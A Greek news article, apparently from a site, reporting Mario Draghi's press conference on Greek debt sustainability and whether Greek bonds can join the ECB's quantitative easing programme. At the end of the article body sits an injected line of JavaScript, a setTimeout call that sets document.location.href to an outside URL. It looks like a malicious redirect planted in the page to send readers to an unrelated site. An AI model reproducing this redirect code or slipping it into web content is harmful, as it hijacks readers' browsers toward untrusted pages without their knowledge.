«Πάγος» Ντράγκι στις αγορές των ελληνικών ομολόγων

0
5

 

Την ανάγκη να ληφθούν πρόσθετα μέτρα, που θα διασφαλίζουν τη βιωσιμότητα του ελληνικού χρέους, επισήμανε ο επικεφαλής της Ευρωπαϊκής Κεντρικής Τράπεζας, Μάριο Ντράγκι.

Μιλώντας στο πλαίσιο συνέντευξης Τύπου στη Φρανκφούρτη, δήλωσε ότι οι «συζητήσεις για τη βιωσιμότητα του δημοσίου χρέους συνεχίζονται», προσθέτοντας ότι, όταν αυτές ολοκληρωθούν, το διοικητικό συμβούλιο της ΕΚΤ, λειτουργώντας ανεξάρτητα, θα αξιολογήσει την βιωσιμότητα του δημοσίου χρέους.

Συνακόλουθα, όπως ανέφερε, είναι ακόμη «πολύ νωρίς να μιλάμε για την συμμετοχή των ελληνικών ομολόγων στο πρόγραμμα ποσοτικής χαλάρωσης» (QE).

Πάντως, το διοικητικό συμβούλιο της ΕΚΤ δεν εξέτασε το ενδεχόμενο να επεκταθεί το πρόγραμμα αγοράς ομολόγων (QE) και μετά τον Μάρτιο του 2017.

Ωστόσο, όπως είπε ο κ. Ντράγκι, είναι μάλλον απίθανο το πρόγραμμα να σταματήσει απότομα, αφήνοντας να εννοηθεί ότι θα προκριθεί μία σταδιακή μείωση του ποσού των ομολόγων από το επίπεδο των 80 δισ. ευρώ το μήνα, που απορροφά σήμερα από την αγορά η ΕΚΤ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here